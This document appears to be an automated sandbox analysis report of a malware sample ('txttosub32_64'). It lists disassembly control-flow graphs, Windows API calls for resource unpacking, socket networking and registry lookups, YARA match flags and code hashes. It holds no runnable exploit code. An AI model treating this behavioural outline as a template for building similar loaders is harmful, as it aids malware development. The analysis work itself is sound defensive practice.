                                                                                  control_flow_graph 598 401f64-401f84 FindResourceA 599 401f86-401f9d GetLastError SizeofResource 598->599 600 401f9f-401fa1 598->600 599->600 601 401fa6-401fec LoadResource LockResource GlobalAlloc call 402800 * 2 599->601 602 402096-40209a 600->602 607 401fee-401ff9 601->607 607->607 608 401ffb-402003 GetTickCount 607->608 609 402032-402038 608->609 610 402005-402007 608->610 611 402053-402083 GlobalAlloc call 401c26 609->611 612 40203a-40204a 609->612 610->611 613 402009-40200f 610->613 618 402088-402093 611->618 614 40204c 612->614 615 40204e-402051 612->615 613->611 617 402011-402023 613->617 614->615 615->611 615->612 619 402025 617->619 620 402027-40202a 617->620 618->602 619->620 620->617 621 40202c-40202e 620->621 621->613 622 402030 621->622 622->611
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                  • GetLastError.KERNEL32 ref: 00401F86
                                                                                  • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                  • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                  • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                  • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                  • String ID:
                                                                                  • API String ID: 564119183-0
                                                                                  • Opcode ID: b8ab49cb6f337489f7617a18fa125088dc3265528f6f41233dd1b5663ec2b1c1
                                                                                  • Instruction ID: 1be2e906f8c1fa24b068d7f298cd5fd7e142d89462db5bca1046e8a0a1248d98
                                                                                  • Opcode Fuzzy Hash: b8ab49cb6f337489f7617a18fa125088dc3265528f6f41233dd1b5663ec2b1c1
                                                                                  • Instruction Fuzzy Hash: 76314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7281D6748841C7A8

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D92706
                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D9272B
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DB5A93), ref: 02D92738
                                                                                    • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                                  • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D92778
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D927D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                  • String ID: timer
                                                                                  • API String ID: 4293676635-1792073242
                                                                                  • Opcode ID: bb5d54acaf2a5bef535a4ad7c37615d2f7b378b68841a3bd28255b8aeddc58e3
                                                                                  • Instruction ID: 95ba3e9f5eabb2fedcd3a73a294172c76eb5b8aa25637f30f12e37b8a60eda42
                                                                                  • Opcode Fuzzy Hash: bb5d54acaf2a5bef535a4ad7c37615d2f7b378b68841a3bd28255b8aeddc58e3
                                                                                  • Instruction Fuzzy Hash: FA318BB2908702EFD710DF25D948B66BBE8FB48725F004A2EF85692780D770EC04CBA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 674 2d92b95-2d92baf 675 2d92bb1-2d92bb9 call 2da0a50 674->675 676 2d92bc7-2d92bcb 674->676 683 2d92bbf-2d92bc2 675->683 677 2d92bcd-2d92bd0 676->677 678 2d92bdf 676->678 677->678 681 2d92bd2-2d92bdd call 2da0a50 677->681 682 2d92be2-2d92c11 WSASetLastError WSARecv call 2d9a43c 678->682 681->683 688 2d92c16-2d92c1d 682->688 686 2d92d30 683->686 689 2d92d32-2d92d38 686->689 690 2d92c2c-2d92c32 688->690 691 2d92c1f-2d92c2a call 2da0a50 688->691 693 2d92c34-2d92c39 call 2da0a50 690->693 694 2d92c46-2d92c48 690->694 702 2d92c3f-2d92c42 691->702 693->702 696 2d92c4a-2d92c4d 694->696 697 2d92c4f-2d92c60 call 2da0a50 694->697 700 2d92c66-2d92c69 696->700 697->689 697->700 704 2d92c6b-2d92c6d 700->704 705 2d92c73-2d92c76 700->705 702->694 704->705 706 2d92d22-2d92d2d call 2d91996 704->706 705->686 707 2d92c7c-2d92c9a call 2da0a50 call 2d9166f 705->707 706->686 714 2d92cbc-2d92cfa WSASetLastError select call 2d9a43c 707->714 715 2d92c9c-2d92cba call 2da0a50 call 2d9166f 707->715 721 2d92d08 714->721 722 2d92cfc-2d92d06 call 2da0a50 714->722 715->686 715->714 725 2d92d0a-2d92d12 call 2da0a50 721->725 726 2d92d15-2d92d17 721->726 727 2d92d19-2d92d1d 722->727 725->726 726->686 726->727 727->682
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D92BE4
                                                                                  • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D92C07
                                                                                    • Part of subcall function 02D9A43C: WSAGetLastError.WS2_32(00000000,?,?,02D92A51), ref: 02D9A44A
                                                                                  • WSASetLastError.WS2_32 ref: 02D92CD3
                                                                                  • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D92CE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Recvselect
                                                                                  • String ID: 3'
                                                                                  • API String ID: 886190287-280543908
                                                                                  • Opcode ID: 82b4928aa78e6fe61d38d200146f4501a398338bf45acc032140c82f1cde49e8
                                                                                  • Instruction ID: abc5d5c80ac56fd64f3f2b55fad49d5f7090ac63b586d1a180ca82c368cf6a9c
                                                                                  • Opcode Fuzzy Hash: 82b4928aa78e6fe61d38d200146f4501a398338bf45acc032140c82f1cde49e8
                                                                                  • Instruction Fuzzy Hash: BD413EB1909301AFDB109F64C518B6BBBE9EF84359F10491EF89A87380EB74DD40CBA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 782 2d929ee-2d92a06 783 2d92a0c-2d92a10 782->783 784 2d92ab3-2d92abb call 2da0a50 782->784 786 2d92a39-2d92a4c WSASetLastError closesocket call 2d9a43c 783->786 787 2d92a12-2d92a15 783->787 791 2d92abe-2d92ac6 784->791 792 2d92a51-2d92a55 786->792 787->786 790 2d92a17-2d92a36 call 2da0a50 call 2d92f50 787->790 790->786 792->784 794 2d92a57-2d92a5f call 2da0a50 792->794 800 2d92a69-2d92a71 call 2da0a50 794->800 801 2d92a61-2d92a67 794->801 806 2d92aaf-2d92ab1 800->806 807 2d92a73-2d92a79 800->807 801->800 802 2d92a7b-2d92aad ioctlsocket WSASetLastError closesocket call 2d9a43c 801->802 802->806 806->784 806->791 807->802 807->806
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D92A3B
                                                                                  • closesocket.WS2_32 ref: 02D92A42
                                                                                  • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D92A89
                                                                                  • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D92A97
                                                                                  • closesocket.WS2_32 ref: 02D92A9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1561005644-0
                                                                                  • Opcode ID: 0be6ba2cc6db5e626319639750d1f25ea5c2e3dc1204bd405e6c24c0e835a23f
                                                                                  • Instruction ID: 7487972ed30898a3eaee2c6ed02b915be4928c3b97f878ede7513588cb0b9341
                                                                                  • Opcode Fuzzy Hash: 0be6ba2cc6db5e626319639750d1f25ea5c2e3dc1204bd405e6c24c0e835a23f
                                                                                  • Instruction Fuzzy Hash: EE21C773E04205EBEF219BB89958B6AB7E9EF44315F144969F805C3341EB70DD44CB60

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 809 2d91ba7-2d91bcf call 2db5330 RtlEnterCriticalSection 812 2d91be9-2d91bf7 RtlLeaveCriticalSection call 2d9e263 809->812 813 2d91bd1 809->813 816 2d91bfa-2d91c20 RtlEnterCriticalSection 812->816 814 2d91bd4-2d91be0 call 2d91b79 813->814 819 2d91be2-2d91be7 814->819 820 2d91c55-2d91c6e RtlLeaveCriticalSection 814->820 818 2d91c34-2d91c36 816->818 821 2d91c38-2d91c43 818->821 822 2d91c22-2d91c2f call 2d91b79 818->822 819->812 819->814 823 2d91c45-2d91c4b 821->823 822->823 827 2d91c31 822->827 823->820 825 2d91c4d-2d91c51 823->825 825->820 827->818
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D91BAC
                                                                                  • RtlEnterCriticalSection.NTDLL ref: 02D91BBC
                                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02D91BEA
                                                                                  • RtlEnterCriticalSection.NTDLL ref: 02D91C13
                                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02D91C56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 1633115879-0
                                                                                  • Opcode ID: 745d6ea5b7b2abc23393dbfc432ce3177376551741dda4c3423f6bae3f7d56aa
                                                                                  • Instruction ID: 5ddb125ba022ee8cb54d09e6ded8f1f0b45e0b8748669a237ea2990cff68939e
                                                                                  • Opcode Fuzzy Hash: 745d6ea5b7b2abc23393dbfc432ce3177376551741dda4c3423f6bae3f7d56aa
                                                                                  • Instruction Fuzzy Hash: B0214675A00215EBDB15CF68C444B9ABBB5FF89714F20858AE85997301D774ED01CBA0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetVersion.KERNEL32 ref: 00402D86
                                                                                    • Part of subcall function 004039F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                    • Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40
                                                                                  • GetCommandLineA.KERNEL32 ref: 00402DD4
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00402DFF
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22
                                                                                    • Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2057626494-0
                                                                                  • Opcode ID: bd0262bfb2af27a0684f304e6cd50cc9f7e4ef426f2b9e6b865b5defdda70d5f
                                                                                  • Instruction ID: 2383c6ba97488d9f6b9c108f3444bed604924ccc724864726876773bbfbfc9d9
                                                                                  • Opcode Fuzzy Hash: bd0262bfb2af27a0684f304e6cd50cc9f7e4ef426f2b9e6b865b5defdda70d5f
                                                                                  • Instruction Fuzzy Hash: 5D219FB0880715AADB04AFA6DE49A6E7BB8EB44704F10413FF506B62E1DB788550CB99

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D92EEE
                                                                                  • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D92EFD
                                                                                  • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D92F0C
                                                                                  • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D92F36
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Socketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 2093263913-0
                                                                                  • Opcode ID: bfa181370373534f88af63705974ccfe658bf5ca05790b6fe539cb1e867b743e
                                                                                  • Instruction ID: 471d94c05b7555178aded99a0ac649e38b07749c185787729c07c11aa47d9dda
                                                                                  • Opcode Fuzzy Hash: bfa181370373534f88af63705974ccfe658bf5ca05790b6fe539cb1e867b743e
                                                                                  • Instruction Fuzzy Hash: 80012572A41204FBDB215F66DC58F5ABBA9EB89761F008565F9199B381D7708D00CBB0
                                                                                  APIs
                                                                                    • Part of subcall function 02D92D39: WSASetLastError.WS2_32(00000000), ref: 02D92D47
                                                                                    • Part of subcall function 02D92D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D92D5C
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D92E6D
                                                                                  • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D92E83
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Sendselect
                                                                                  • String ID: 3'
                                                                                  • API String ID: 2958345159-280543908
                                                                                  • Opcode ID: 0f8c9463b6d4f938948040f553666550db57bdfc0cef311f296c2782a7e98697
                                                                                  • Instruction ID: 409abe2969071feb1b767162618eff7f04fad0ba027ee49c0196511dd9ad3b81
                                                                                  • Opcode Fuzzy Hash: 0f8c9463b6d4f938948040f553666550db57bdfc0cef311f296c2782a7e98697
                                                                                  • Instruction Fuzzy Hash: 37315CB1E00209ABDF119FA8C858BEE7BAAEF44354F00455AEC4997340E775AD55CBE0
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D92AEA
                                                                                  • connect.WS2_32(?,?,?), ref: 02D92AF5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastconnect
                                                                                  • String ID: 3'
                                                                                  • API String ID: 374722065-280543908
                                                                                  • Opcode ID: 0418dbadacc92e4b1efc2f194464d6c39b98822929c7ee1ee12e920193d4cb67
                                                                                  • Instruction ID: 0afcc23cc28023702985fbf18eec1122d9bbe896c6a2ee9722025f903286c145
                                                                                  • Opcode Fuzzy Hash: 0418dbadacc92e4b1efc2f194464d6c39b98822929c7ee1ee12e920193d4cb67
                                                                                  • Instruction Fuzzy Hash: C521A471E04204ABDF14AFB4C418BAEBBFAEF44325F108599ED1993384DB749E058FA1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 0678fc4831c44a0679f1550c2eb28ea4ce259442083f65ef4dcb1602fca93460
                                                                                  • Instruction ID: 6ab9dc85dac0efa37d735786f6d3e56a219c3982a18bfa13e727e2d9fdf97e32
                                                                                  • Opcode Fuzzy Hash: 0678fc4831c44a0679f1550c2eb28ea4ce259442083f65ef4dcb1602fca93460
                                                                                  • Instruction Fuzzy Hash: B95109B1904256DFCF49DF68D554AAABBA1FF08320F10819AF8699B380D774ED10CFA1
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02D936A7
                                                                                    • Part of subcall function 02D92420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D92432
                                                                                    • Part of subcall function 02D92420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D92445
                                                                                    • Part of subcall function 02D92420: RtlEnterCriticalSection.NTDLL(?), ref: 02D92454
                                                                                    • Part of subcall function 02D92420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D92469
                                                                                    • Part of subcall function 02D92420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D92470
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1601054111-0
                                                                                  • Opcode ID: d573a4629d340eab99a54c0f30da7730b5602fb168cca82297dbc83d4d1057b1
                                                                                  • Instruction ID: 26f8727f2f8e79e5c4488555cfa9995d523b54d56019dc4ab80bb4a0fc0bc2f1
                                                                                  • Opcode Fuzzy Hash: d573a4629d340eab99a54c0f30da7730b5602fb168cca82297dbc83d4d1057b1
                                                                                  • Instruction Fuzzy Hash: C511C1B6100209EBDF219E14DC85FAA3B6AEF44354F104456FE528A390C735DC60CBA4
                                                                                  APIs
                                                                                  • __beginthreadex.LIBCMT ref: 02DA2046
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D9A8BC,00000000), ref: 02DA2077
                                                                                  • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D9A8BC,00000000), ref: 02DA2085
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleResumeThread__beginthreadex
                                                                                  • String ID:
                                                                                  • API String ID: 1685284544-0
                                                                                  • Opcode ID: be0879672a44cb637c95806daa7feac8d7f4dd5f003daa9b5e27c744f8fad4c9
                                                                                  • Instruction ID: 76bb5f83a41d84118837a80101b7f28045617d1f3a82b2966131237c16d8c7a2
                                                                                  • Opcode Fuzzy Hash: be0879672a44cb637c95806daa7feac8d7f4dd5f003daa9b5e27c744f8fad4c9
                                                                                  • Instruction Fuzzy Hash: CCF0C271240200AFE7209E6DDC95F91B3E8EF88324F24456AF948D7380C371EC92CB94
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(02DC727C), ref: 02D91ABA
                                                                                  • WSAStartup.WS2_32(00000002,00000000), ref: 02D91ACB
                                                                                  • InterlockedExchange.KERNEL32(02DC7280,00000000), ref: 02D91AD7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$ExchangeIncrementStartup
                                                                                  • String ID:
                                                                                  • API String ID: 1856147945-0
                                                                                  • Opcode ID: 09394612edf93305479633c1ed31aaa981c5ab529e35c1b72f2b157f2779d26a
                                                                                  • Instruction ID: ef444d62c55372aa6b0c7ac5574272ed88ed435cd39a5f52ae1b074854024d2b
                                                                                  • Opcode Fuzzy Hash: 09394612edf93305479633c1ed31aaa981c5ab529e35c1b72f2b157f2779d26a
                                                                                  • Instruction Fuzzy Hash: F8D02E32980204DBF22166A0BC0EB78F32CE709610F200706FC6AC13C0EB005D2489A2
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNELBASE ref: 0040B5E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory
                                                                                  • String ID: Eurofighter Typhoon Game 10.8.45
                                                                                  • API String ID: 4241100979-3737203378
                                                                                  • Opcode ID: 58b6256202baa6b16a63778b3b4b6e7e70783ea1ae45c23d9c43ee22c52abb22
                                                                                  • Instruction ID: 59f8aa5540261597849b1692093c9b126526da78e0ee419d089631d7b570a2e8
                                                                                  • Opcode Fuzzy Hash: 58b6256202baa6b16a63778b3b4b6e7e70783ea1ae45c23d9c43ee22c52abb22
                                                                                  • Instruction Fuzzy Hash: 26D092558CE421E3E10222610E49CAF581C986A34973080BBBA12361C357BD151722FF
                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040B609
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID: Common AppData
                                                                                  • API String ID: 3660427363-2574214464
                                                                                  • Opcode ID: f54de138d155ccd2b772735bbc4ce10ebd25af39d422cb26c2b0e994405b15f8
                                                                                  • Instruction ID: b3f43e184ad0699df8cbe20ab7ced0abb3ab959bd1bcc6b546273662c5c40860
                                                                                  • Opcode Fuzzy Hash: f54de138d155ccd2b772735bbc4ce10ebd25af39d422cb26c2b0e994405b15f8
                                                                                  • Instruction Fuzzy Hash: 5AD0A7205882456FD3024BA05D44BFF7FA8FB40205B604567E863F70D2C7780512B65E
                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040B609
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID: Common AppData
                                                                                  • API String ID: 3660427363-2574214464
                                                                                  • Opcode ID: 3ed9f77ee88b69f5a490583fa91d6425528d89cf7000008136e3ad1ca7117e53
                                                                                  • Instruction ID: 8c41a3d32a9a2153f89dec504db3ab6630bfeadca5766f04d81e80a0cc2bd6ef
                                                                                  • Opcode Fuzzy Hash: 3ed9f77ee88b69f5a490583fa91d6425528d89cf7000008136e3ad1ca7117e53
                                                                                  • Instruction Fuzzy Hash: 91C08CB0988114FFD7114F508E84E7F7A3CEA043803204836E023B50C0C7BC48227AAF
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040B269
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004027CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                  • API String ID: 71445658-2036018995
                                                                                  • Opcode ID: b694331e112d8ca46f0e0ff566735e3bb6613ddb8e6cc909969c63ad37751ecc
                                                                                  • Instruction ID: 05bad1b2280f138e32703539067c11831894610465f6b9f5e734bb3fb31a4ec8
                                                                                  • Opcode Fuzzy Hash: b694331e112d8ca46f0e0ff566735e3bb6613ddb8e6cc909969c63ad37751ecc
                                                                                  • Instruction Fuzzy Hash: A1B0921065D201E9F20216310E4EB272149DB04B04B30863B6A13B20D8D7BC5092A17F
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D94BF2
                                                                                    • Part of subcall function 02D91BA7: __EH_prolog.LIBCMT ref: 02D91BAC
                                                                                    • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91BBC
                                                                                    • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91BEA
                                                                                    • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91C13
                                                                                    • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91C56
                                                                                    • Part of subcall function 02D9E02B: __EH_prolog.LIBCMT ref: 02D9E030
                                                                                    • Part of subcall function 02D9E02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D9E0AF
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D94CF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                  • String ID:
                                                                                  • API String ID: 1927618982-0
                                                                                  • Opcode ID: 601edccc4cd81c53f75b486f1d6d5a363466c4cafbcae9c424010411bc23a266
                                                                                  • Instruction ID: 3fdf747471d011e421147e3ac081d38815074cb9e6e15d6f01e9cd627feb6f20
                                                                                  • Opcode Fuzzy Hash: 601edccc4cd81c53f75b486f1d6d5a363466c4cafbcae9c424010411bc23a266
                                                                                  • Instruction Fuzzy Hash: 0E510475D04248DFDF15DFA8D884AEEBBB5EF09314F14815AE905AB352DB309A44CF60
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D92D47
                                                                                  • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D92D5C
                                                                                    • Part of subcall function 02D9A43C: WSAGetLastError.WS2_32(00000000,?,?,02D92A51), ref: 02D9A44A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Send
                                                                                  • String ID:
                                                                                  • API String ID: 1282938840-0
                                                                                  • Opcode ID: 1f80f119a025de53b40b627293231f17b74ff2cda29eca3df3cbcf8e8a2150e8
                                                                                  • Instruction ID: 4a452ad76fb7e28ec98a399b1e94a16694587360682a53d17d3dcb3acb557090
                                                                                  • Opcode Fuzzy Hash: 1f80f119a025de53b40b627293231f17b74ff2cda29eca3df3cbcf8e8a2150e8
